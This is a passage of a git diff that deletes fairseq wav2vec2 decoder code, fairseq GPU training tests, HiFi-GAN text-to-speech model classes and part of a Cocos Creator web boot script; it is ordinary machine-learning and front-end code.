self.final_dropout(x) - - if self.proj: - x = self.proj(x) - - return { - "encoder_out": x, # T x B x C - "padding_mask": padding_mask, # B x T, - "layer_results": res["layer_results"], - } - - def forward_torchscript(self, net_input): - if torch.jit.is_scripting(): - return self.forward(net_input["source"], net_input["padding_mask"]) - else: - return self.forward_non_torchscript(net_input) - - def reorder_encoder_out(self, encoder_out, new_order): - if encoder_out["encoder_out"] is not None: - encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select( - 1, new_order - ) - if encoder_out["padding_mask"] is not None: - encoder_out["padding_mask"] = encoder_out[ - "padding_mask" - ].index_select(0, new_order) - return encoder_out - - def max_positions(self): - """Maximum input length supported by the encoder.""" - return None - - def upgrade_state_dict_named(self, state_dict, name): - return state_dict - - -class TransformerDecoder(FairseqIncrementalDecoder): - """ - Transformer decoder consisting of *args.decoder_layers* layers. Each layer - is a :class:`TransformerDecoderLayer`. - - Args: - args (argparse.Namespace): parsed command-line arguments - dictionary (~fairseq.data.Dictionary): decoding dictionary - embed_tokens (torch.nn.Embedding): output embedding - no_encoder_attn (bool, optional): whether to attend to encoder outputs - (default: False). - """ - - def __init__( - self, - cfg: Wav2Vec2Seq2SeqConfig, - dictionary, - embed_tokens, - no_encoder_attn=False, - ): - super().__init__(dictionary) - - self.dropout = cfg.decoder_dropout - self.share_input_output_embed = cfg.share_decoder_input_output_embed - - input_embed_dim = embed_tokens.embedding_dim - embed_dim = cfg.decoder_embed_dim - self.output_embed_dim = cfg.decoder_embed_dim - - self.layerdrop = cfg.decoder_layerdrop - - self.padding_idx = embed_tokens.padding_idx - self.max_target_positions = cfg.max_target_positions - - self.embed_tokens = embed_tokens - self.embed_scale = math.sqrt(embed_dim) # todo: try with input_embed_dim - - self.project_in_dim = ( - Linear(input_embed_dim, embed_dim, bias=False) - if embed_dim != input_embed_dim - else None - ) - - self.embed_positions = ( - PositionalEmbedding( - cfg.max_target_positions, - embed_dim, - self.padding_idx, - learned=cfg.decoder_learned_pos, - ) - if not cfg.no_token_positional_embeddings - else None - ) - - # TODO: update this when transformer gets converted to dataclass configs - transformer_cfg = copy.deepcopy(cfg) - with open_dict(transformer_cfg): - transformer_cfg.dropout = transformer_cfg.decoder_dropout - transformer_cfg.attention_dropout = ( - transformer_cfg.decoder_attention_dropout - ) - transformer_cfg.activation_dropout = ( - transformer_cfg.decoder_activation_dropout - ) - - self.layers = nn.ModuleList([]) - self.layers.extend( - [ - TransformerDecoderLayer(transformer_cfg, no_encoder_attn) - for _ in range(transformer_cfg.decoder_layers) - ] - ) - - if not self.share_input_output_embed: - self.embed_out = nn.Parameter( - torch.Tensor(len(dictionary), self.output_embed_dim) - ) - nn.init.normal_(self.embed_out, mean=0, std=self.output_embed_dim ** -0.5) - - if transformer_cfg.decoder_normalize_before: - self.layer_norm = LayerNorm(embed_dim) - else: - self.layer_norm = None - - def forward( - self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused - ): - """ - Args: - prev_output_tokens (LongTensor): previous decoder outputs of shape - `(batch, tgt_len)`, for teacher forcing - encoder_out (Tensor, optional): output from the encoder, used for - encoder-side attention - incremental_state (dict): dictionary used for storing state during - :ref:`Incremental decoding` - - Returns: - tuple: - - the decoder's output of shape `(batch, tgt_len, vocab)` - - a dictionary with any model-specific outputs - """ - prev_output_tokens = prev_output_tokens.long() - x, extra = self.extract_features( - prev_output_tokens, encoder_out, incremental_state - ) - x = self.output_layer(x) - return x, extra - - def extract_features( - self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused - ): - """ - Similar to *forward* but only return features. - - Returns: - tuple: - - the decoder's features of shape `(batch, tgt_len, embed_dim)` - - a dictionary with any model-specific outputs - """ - - # embed positions - positions = ( - self.embed_positions( - prev_output_tokens, incremental_state=incremental_state - ) - if self.embed_positions is not None - else None - ) - - if incremental_state is not None: - prev_output_tokens = prev_output_tokens[:, -1:] - if positions is not None: - positions = positions[:, -1:] - - # embed tokens and positions - x = self.embed_scale * self.embed_tokens(prev_output_tokens) - - if self.project_in_dim is not None: - x = self.project_in_dim(x) - - if positions is not None: - x += positions - x = F.dropout(x, p=self.dropout, training=self.training) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - attn = None - - inner_states = [x] - - # decoder layers - self_attn_padding_mask = None - if prev_output_tokens.eq(self.padding_idx).any(): - self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx) - for layer in self.layers: - dropout_probability = np.random.random() - if not self.training or (dropout_probability > self.layerdrop): - x, attn, _ = layer( - x, - encoder_out["encoder_out"] if encoder_out is not None else None, - encoder_out["padding_mask"] if encoder_out is not None else None, - incremental_state, - self_attn_mask=self.buffered_future_mask(x) - if incremental_state is None - else None, - self_attn_padding_mask=self_attn_padding_mask - ) - inner_states.append(x) - - if self.layer_norm: - x = self.layer_norm(x) - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - - return x, {"attn": attn, "inner_states": inner_states} - - def output_layer(self, features, **kwargs): - """Project features to the vocabulary size.""" - # project back to size of vocabulary - if self.share_input_output_embed: - return F.linear(features, self.embed_tokens.weight) - else: - return F.linear(features, self.embed_out) - - def max_positions(self): - """Maximum output length supported by the decoder.""" - if self.embed_positions is None: - return self.max_target_positions - return min(self.max_target_positions, self.embed_positions.max_positions) - - def buffered_future_mask(self, tensor): - dim = tensor.size(0) - if ( - not hasattr(self, "_future_mask") - or self._future_mask is None - or self._future_mask.device != tensor.device - or self._future_mask.size(0) < dim - ): - self._future_mask = torch.triu( - utils.fill_with_neg_inf(tensor.new(dim, dim)), 1 - ) - return self._future_mask[:dim, :dim] - - def upgrade_state_dict_named(self, state_dict, name): - return state_dict - - -def Embedding(num_embeddings, embedding_dim, padding_idx): - m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) - nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) - nn.init.constant_(m.weight[padding_idx], 0) - return m - - -def Linear(in_features, out_features, bias=True): - m = nn.Linear(in_features, out_features, bias) - nn.init.xavier_uniform_(m.weight) - if bias: - nn.init.constant_(m.bias, 0.0) - return m diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/tests/gpu/test_binaries_gpu.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/tests/gpu/test_binaries_gpu.py deleted file mode 100644 index de8c2426134089035c6e0e5da223647bab6f3dba..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/tests/gpu/test_binaries_gpu.py +++ /dev/null @@ -1,449 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import contextlib -import logging -import json -import os -import tempfile -import unittest -from io import StringIO - -import torch -from fairseq import options -from fairseq_cli import train -from tests.utils import ( - create_dummy_data, - generate_main, - preprocess_lm_data, - preprocess_translation_data, - train_translation_model, -) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestTranslationGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fp16_multigpu(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--fp16", "--log-file", log], - world_size=min(torch.cuda.device_count(), 2), - ) - generate_main(data_dir) - assert os.path.exists(log) - - @staticmethod - def parse_logs(logfile): - logs = [] - for ln in open(logfile, "r").readlines(): - try: - logs.append(json.loads(ln)) - except json.JSONDecodeError: - continue - return logs - - def test_resume_training_fsdp(self): - self._test_resume_training(["--ddp-backend", "fully_sharded"]) - - def test_resume_training_fsdp_sharded_state(self): - self._test_resume_training(["--ddp-backend", "fully_sharded", "--use-sharded-state"]) - - def test_resume_training_noc10d(self): - self._test_resume_training([]) - - def _test_resume_training(self, extra_clargs, arch="fconv_iwslt_de_en"): - flags = [ - "--fp16", - "--log-format", - "json", - "--max-update", - "10", - "--save-interval-updates", - "2", - "--log-interval", - "1", - ] + extra_clargs - world_size = min(torch.cuda.device_count(), 2) - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, arch, flags + ["--log-file", log], world_size=world_size, - ) - log2 = os.path.join(data_dir, "resume.log") - restore_file = os.path.join(data_dir, "checkpoint_1_2.pt") - train_translation_model( - data_dir, - arch, - flags + ["--log-file", log2, "--restore-file", restore_file], - world_size=world_size, - ) - - l1 = self.parse_logs(log) - l2 = self.parse_logs(log2) - assert int(l2[0]["num_updates"]) == 3, f"{l1}\n\n {l2}" - for k in [ - "train_loss", - "train_num_updates", - "train_ppl", - "train_gnorm", - ]: - from_scratch, resumed = l1[-1][k], l2[-1][k] - assert ( - from_scratch == resumed - ), f"difference at {k} {from_scratch} != {resumed}" - - def test_memory_efficient_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_memory_efficient_fp16") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--memory-efficient-fp16"] - ) - generate_main(data_dir) - - def test_transformer_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--fp16", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_amp") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en", ["--amp"]) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_transformer_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--amp", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_levenshtein_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_levenshtein_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "levenshtein_transformer", - [ - "--apply-bert-init", - "--early-exit", - "6,6,6", - "--criterion", - "nat_loss", - ], - task="translation_lev", - ) - gen_config = [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ] - # non-ensemble generation - generate_main(data_dir, gen_config) - # ensemble generation - generate_main( - data_dir, - gen_config, - path=os.pathsep.join( - [ - os.path.join(data_dir, "checkpoint_last.pt"), - os.path.join(data_dir, "checkpoint_last.pt"), - ] - ), - ) - - def test_fsdp_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded"], - world_size=world_size, - ) - generate_main(data_dir) - assert os.path.exists(log) - - def test_fsdp_sharded_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded", "--use-sharded-state"], - world_size=world_size, - ) - generate_main(data_dir, ["--checkpoint-shard-count", str(world_size)]) - assert os.path.exists(log) - - -def _quantize_language_model(data_dir, arch, extra_flags=None, run_validation=False): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - # try scalar quantization - scalar_quant_train_parser = options.get_training_parser() - scalar_quant_train_args = options.parse_args_and_arch( - scalar_quant_train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-update", - "3", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--quant-noise-scalar", - "0.5", - ] - + (extra_flags or []), - ) - train.main(scalar_quant_train_args) - - # try iterative PQ quantization - quantize_parser = options.get_training_parser() - quantize_args = options.parse_args_and_arch( - quantize_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "50", - "--tokens-per-sample", - "50", - "--max-update", - "6", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--restore-file", - os.path.join(data_dir, "checkpoint_last.pt"), - "--reset-optimizer", - "--quantization-config-path", - os.path.join( - os.path.dirname(__file__), "transformer_quantization_config.yaml" - ), - ] - + (extra_flags or []), - ) - train.main(quantize_args) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestQuantization(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_quantization(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_quantization") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - # tests both scalar and iterative PQ quantization - _quantize_language_model(data_dir, "transformer_lm") - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestOptimizersGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_flat_grads(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_flat_grads") as data_dir: - # Use just a bit of data and tiny model to keep this test runtime reasonable - create_dummy_data(data_dir, num_examples=10, maxlen=5) - preprocess_translation_data(data_dir) - with self.assertRaises(RuntimeError): - # adafactor isn't compatible with flat grads, which - # are used by default with --fp16 - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - ], - ) - # but it should pass once we set --fp16-no-flatten-grads - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - "--fp16-no-flatten-grads", - ], - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/Harveenchadha/Vakyansh-Odia-TTS/ttsv/src/hifi_gan/models.py b/spaces/Harveenchadha/Vakyansh-Odia-TTS/ttsv/src/hifi_gan/models.py deleted file mode 100644 index be51fa51407e6ce1daaee5e8d090f6acdbee0db9..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Odia-TTS/ttsv/src/hifi_gan/models.py +++ /dev/null @@ -1,403 +0,0 @@ -import torch -import torch.nn.functional as F -import torch.nn as nn -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from utils import init_weights, get_padding - -LRELU_SLOPE = 0.1 - - -class ResBlock1(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.h = h - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - ] - ) - self.convs2.apply(init_weights) - - def forward(self, x): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - xt = c2(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.h = h - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - self.convs.apply(init_weights) - - def forward(self, x): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Generator(torch.nn.Module): - def __init__(self, h): - super(Generator, self).__init__() - self.h = h - self.num_kernels = len(h.resblock_kernel_sizes) - self.num_upsamples = len(h.upsample_rates) - self.conv_pre = weight_norm( - Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3) - ) - resblock = ResBlock1 if h.resblock == "1" else ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - h.upsample_initial_channel // (2 ** i), - h.upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = h.upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes) - ): - self.resblocks.append(resblock(h, ch, k, d)) - - self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3)) - self.ups.apply(init_weights) - self.conv_post.apply(init_weights) - - def forward(self, x): - x = self.conv_pre(x) - for i in range(self.num_upsamples): - x = F.leaky_relu(x, LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print("Removing weight norm...") - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - remove_weight_norm(self.conv_pre) - remove_weight_norm(self.conv_post) - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(2, 0))), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self): - super(MultiPeriodDiscriminator, self).__init__() - self.discriminators = nn.ModuleList( - [ - DiscriminatorP(2), - DiscriminatorP(3), - DiscriminatorP(5), - DiscriminatorP(7), - DiscriminatorP(11), - ] - ) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 128, 15, 1, padding=7)), - norm_f(Conv1d(128, 128, 41, 2, groups=4, padding=20)), - norm_f(Conv1d(128, 256, 41, 2, groups=16, padding=20)), - norm_f(Conv1d(256, 512, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(512, 1024, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 1, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiScaleDiscriminator(torch.nn.Module): - def __init__(self): - super(MultiScaleDiscriminator, self).__init__() - self.discriminators = nn.ModuleList( - [ - DiscriminatorS(use_spectral_norm=True), - DiscriminatorS(), - DiscriminatorS(), - ] - ) - self.meanpools = nn.ModuleList( - [AvgPool1d(4, 2, padding=2), AvgPool1d(4, 2, padding=2)] - ) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - if i != 0: - y = self.meanpools[i - 1](y) - y_hat = self.meanpools[i - 1](y_hat) - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -def feature_loss(fmap_r, fmap_g): - loss = 0 - for dr, dg in zip(fmap_r, fmap_g): - for rl, gl in zip(dr, dg): - loss += torch.mean(torch.abs(rl - gl)) - - return loss * 2 - - -def discriminator_loss(disc_real_outputs, disc_generated_outputs): - loss = 0 - r_losses = [] - g_losses = [] - for dr, dg in zip(disc_real_outputs, disc_generated_outputs): - r_loss = torch.mean((1 - dr) ** 2) - g_loss = torch.mean(dg ** 2) - loss += r_loss + g_loss - r_losses.append(r_loss.item()) - g_losses.append(g_loss.item()) - - return loss, r_losses, g_losses - - -def generator_loss(disc_outputs): - loss = 0 - gen_losses = [] - for dg in disc_outputs: - l = torch.mean((1 - dg) ** 2) - gen_losses.append(l) - loss += l - - return loss, gen_losses diff --git a/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/__init__.py b/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/HighCWu/Style2Paints-4.5-Gradio/ui/web-mobile/main.91744.js b/spaces/HighCWu/Style2Paints-4.5-Gradio/ui/web-mobile/main.91744.js deleted file mode 100644 index 4b4f97c5f1830bb378d8130aef0efafa97d56832..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/Style2Paints-4.5-Gradio/ui/web-mobile/main.91744.js +++ /dev/null @@ -1,239 +0,0 @@ -(function () { - - function boot () { - - var settings = window._CCSettings; - window._CCSettings = undefined; - - if ( !settings.debug ) { - var uuids = settings.uuids; - - var rawAssets = settings.rawAssets; - var assetTypes = settings.assetTypes; - var realRawAssets = settings.rawAssets = {}; - for (var mount in rawAssets) { - var entries = rawAssets[mount]; - var realEntries = realRawAssets[mount] = {}; - for (var id in entries) { - var entry = entries[id]; - var type = entry[1]; - // retrieve minified raw asset - if (typeof type === 'number') { - entry[1] = assetTypes[type]; - } - // retrieve uuid - realEntries[uuids[id] || id] = entry; - } - } - - var scenes = settings.scenes; - for (var i = 0; i < scenes.length; ++i) { - var scene = scenes[i]; - if (typeof scene.uuid === 'number') { - scene.uuid = uuids[scene.uuid]; - } - } - - var packedAssets = settings.packedAssets; - for (var packId in packedAssets) { - var packedIds = packedAssets[packId]; - for (var j = 0; j < packedIds.length; ++j) { - if (typeof packedIds[j] === 'number') { - packedIds[j] = uuids[packedIds[j]]; - } - } - } - } - - // init engine - var canvas; - - if (cc.sys.isBrowser) { - canvas = document.getElementById('GameCanvas'); - } - - if (false) { - var ORIENTATIONS = { - 'portrait': 1, - 'landscape left': 2, - 'landscape right': 3 - }; - BK.Director.screenMode = ORIENTATIONS[settings.orientation]; - initAdapter(); - } - - function setLoadingDisplay () { - // Loading splash scene - var splash = document.getElementById('splash'); - var progressBar = splash.querySelector('.progress-bar span'); - cc.loader.onProgress = function (completedCount, totalCount, item) { - var percent = 100 * completedCount / totalCount; - if (progressBar) { - progressBar.style.width = percent.toFixed(2) + '%'; - } - }; - splash.style.display = 'block'; - progressBar.style.width = '0%'; - - cc.director.once(cc.Director.EVENT_AFTER_SCENE_LAUNCH, function () { - splash.style.display = 'none'; - }); - } - - var onStart = function () { - cc.loader.downloader._subpackages = settings.subpackages; - - if (false) { - BK.Script.loadlib(); - } - - cc.view.resizeWithBrowserSize(true); - - if (!false && !false) { - if (cc.sys.isBrowser) { - setLoadingDisplay(); - } - - if (cc.sys.isMobile) { - if (settings.orientation === 'landscape') { - cc.view.setOrientation(cc.macro.ORIENTATION_LANDSCAPE); - } - else if (settings.orientation === 'portrait') { - cc.view.setOrientation(cc.macro.ORIENTATION_PORTRAIT); - } - cc.view.enableAutoFullScreen([ - cc.sys.BROWSER_TYPE_BAIDU, - cc.sys.BROWSER_TYPE_WECHAT, - cc.sys.BROWSER_TYPE_MOBILE_QQ, - cc.sys.BROWSER_TYPE_MIUI, - ].indexOf(cc.sys.browserType) < 0); - } - - // Limit downloading max concurrent task to 2, - // more tasks simultaneously may cause performance draw back on some android system / browsers. - // You can adjust the number based on your own test result, you have to set it before any loading process to take effect. - if (cc.sys.isBrowser && cc.sys.os === cc.sys.OS_ANDROID) { - cc.macro.DOWNLOAD_MAX_CONCURRENT = 2; - } - } - - // init assets - cc.AssetLibrary.init({ - libraryPath: 'res/import', - rawAssetsBase: 'res/raw-', - rawAssets: settings.rawAssets, - packedAssets: settings.packedAssets, - md5AssetsMap: settings.md5AssetsMap - }); - - if (false) { - cc.Pipeline.Downloader.PackDownloader._doPreload("WECHAT_SUBDOMAIN", settings.WECHAT_SUBDOMAIN_DATA); - } - - var launchScene = settings.launchScene; - - // load scene - cc.director.loadScene(launchScene, null, - function () { - if (cc.sys.isBrowser) { - // show canvas - canvas.style.visibility = ''; - var div = document.getElementById('GameDiv'); - if (div) { - div.style.backgroundImage = ''; - } - } - cc.loader.onProgress = null; - console.log('Success to load scene: ' + launchScene); - } - ); - }; - - // jsList - var jsList = settings.jsList; - - if (!false) { - var bundledScript = settings.debug ? 'src/project.dev.js' : 'src/project.f12e5.js'; - if (jsList) { - jsList = jsList.map(function (x) { - return 'src/' + x; 